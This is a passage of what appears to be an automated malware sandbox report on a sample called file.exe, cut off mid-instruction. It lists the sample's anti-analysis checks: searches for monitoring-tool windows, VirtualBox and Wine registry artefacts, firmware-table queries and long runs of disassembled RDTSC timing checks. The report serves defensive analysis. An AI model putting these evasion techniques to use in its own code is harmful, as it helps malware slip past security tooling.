              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0489 second address: 7D048F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D048F second address: 7D0494 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB704 second address: 7EB708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB708 second address: 7EB712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB712 second address: 7EB716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB716 second address: 7EB72A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3D50D0EC66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F3D50D0EC66h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EBA4A second address: 7EBA87 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D507EA96Ch 0x00000008 pushad 0x00000009 jnl 00007F3D507EA966h 0x0000000f jmp 00007F3D507EA979h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push ecx 0x0000001a pushad 0x0000001b js 00007F3D507EA966h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EBA87 second address: 7EBA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE144 second address: 7EE148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE3EB second address: 7EE42A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007F3D50D0EC66h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jmp 00007F3D50D0EC70h 0x00000016 push eax 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop eax 0x0000001a popad 0x0000001b pop eax 0x0000001c xor edx, 2073BCAEh 0x00000022 lea ebx, dword ptr [ebp+12463011h] 0x00000028 mov dword ptr [ebp+122D1DD3h], edx 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE42A second address: 7EE42E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE59A second address: 7EE5C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3D50D0EC6Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3D50D0EC72h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE5C5 second address: 7EE5CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE5CB second address: 7EE5CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EE5CF second address: 7EE62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 jmp 00007F3D507EA96Ch 0x0000001c jmp 00007F3D507EA96Bh 0x00000021 popad 0x00000022 pop eax 0x00000023 mov edx, dword ptr [ebp+122D366Dh] 0x00000029 xor ecx, dword ptr [ebp+122D1DBEh] 0x0000002f lea ebx, dword ptr [ebp+1246301Ch] 0x00000035 xchg eax, ebx 0x00000036 push edx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c popad 0x0000003d pop edx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F3D507EA96Dh 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810327 second address: 81032D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA5CB second address: 7DA5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E589 second address: 80E58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E58F second address: 80E594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E709 second address: 80E713 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D50D0EC66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E713 second address: 80E76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F3D507EA96Bh 0x0000000c pop eax 0x0000000d jp 00007F3D507EA980h 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a push ecx 0x0000001b push ebx 0x0000001c jmp 00007F3D507EA978h 0x00000021 pop ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E8A2 second address: 80E8A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E8A6 second address: 80E8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3D507EA977h 0x0000000b pushad 0x0000000c jmp 00007F3D507EA976h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E8DE second address: 80E8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D50D0EC72h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E8F4 second address: 80E8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E8F8 second address: 80E906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80E906 second address: 80E90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EBC0 second address: 80EBCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EBCA second address: 80EBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EBCF second address: 80EBDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3D50D0EC66h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80EBDB second address: 80EBE5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3D507EA966h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80ED5C second address: 80ED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D50D0EC70h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F15F second address: 80F165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F165 second address: 80F174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F2D7 second address: 80F2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F2DB second address: 80F2DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80F2DF second address: 80F306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D507EA970h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F3D507EA96Eh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 802317 second address: 80231E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE95B second address: 7CE960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE960 second address: 7CE966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE966 second address: 7CE96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE96C second address: 7CE974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80FD05 second address: 80FD0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80FD0D second address: 80FD26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F3D50D0EC71h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80FE97 second address: 80FEB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3D507EA977h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80FEB4 second address: 80FEC6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D50D0EC66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80FEC6 second address: 80FECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80FECA second address: 80FECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8186E5 second address: 8186EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8189C2 second address: 8189CC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3D50D0EC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B6A1 second address: 81B6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B6A5 second address: 81B6AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B6AB second address: 81B6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F3D507EA96Fh 0x0000000d push ebx 0x0000000e jmp 00007F3D507EA972h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F3D507EA966h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B957 second address: 81B95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B95B second address: 81B95F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B95F second address: 81B968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B968 second address: 81B96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81DBE0 second address: 81DBE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81DC3B second address: 81DC75 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D507EA97Ah 0x00000008 jmp 00007F3D507EA974h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 07BA3006h 0x00000016 sub esi, dword ptr [ebp+122D37B9h] 0x0000001c push 65EE4410h 0x00000021 jbe 00007F3D507EA974h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81DC75 second address: 81DC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81EBF3 second address: 81EBF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81EC94 second address: 81EC9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81EC9A second address: 81EC9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81EC9E second address: 81ECB5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3D50D0EC6Ah 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81ECB5 second address: 81ECBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81ECBB second address: 81ECD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub esi, 4771C7B8h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81ECD8 second address: 81ECE2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3D507EA966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F1DC second address: 81F1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F1E5 second address: 81F1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F1E9 second address: 81F1F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81F1F5 second address: 81F228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+12485B8Fh], edi 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 mov si, C061h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 mov si, D4A1h 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F3D507EA96Bh 0x00000023 push eax 0x00000024 push edi 0x00000025 je 00007F3D507EA96Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820450 second address: 82045F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 822354 second address: 822374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3D507EA979h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82391B second address: 82391F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 822121 second address: 82213E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3D507EA979h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 822BAF second address: 822BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F3D50D0EC66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82213E second address: 822155 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3D507EA966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F3D507EA968h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 822155 second address: 82215A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826119 second address: 826121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826121 second address: 826129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 826129 second address: 826135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D7001 second address: 7D703A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D50D0EC6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F3D50D0EC6Ah 0x00000011 popad 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3D50D0EC79h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D703A second address: 7D703E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 829CC8 second address: 829CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82AEE8 second address: 82AEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CF22 second address: 82CF2C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3D50D0EC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C030 second address: 82C038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82C038 second address: 82C0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F3D50D0EC76h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F3D50D0EC68h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 js 00007F3D50D0EC6Ch 0x0000002d mov edi, dword ptr [ebp+122D1F76h] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a mov edi, dword ptr [ebp+122D35ADh] 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 sub dword ptr [ebp+122D55A7h], ebx 0x0000004d mov eax, dword ptr [ebp+122D0481h] 0x00000053 push 00000000h 0x00000055 push ecx 0x00000056 call 00007F3D50D0EC68h 0x0000005b pop ecx 0x0000005c mov dword ptr [esp+04h], ecx 0x00000060 add dword ptr [esp+04h], 00000017h 0x00000068 inc ecx 0x00000069 push ecx 0x0000006a ret 0x0000006b pop ecx 0x0000006c ret 0x0000006d xor di, F400h 0x00000072 push FFFFFFFFh 0x00000074 call 00007F3D50D0EC72h 0x00000079 pop edi 0x0000007a mov ebx, edx 0x0000007c nop 0x0000007d pushad 0x0000007e jmp 00007F3D50D0EC71h 0x00000083 push eax 0x00000084 push edx 0x00000085 push ecx 0x00000086 pop 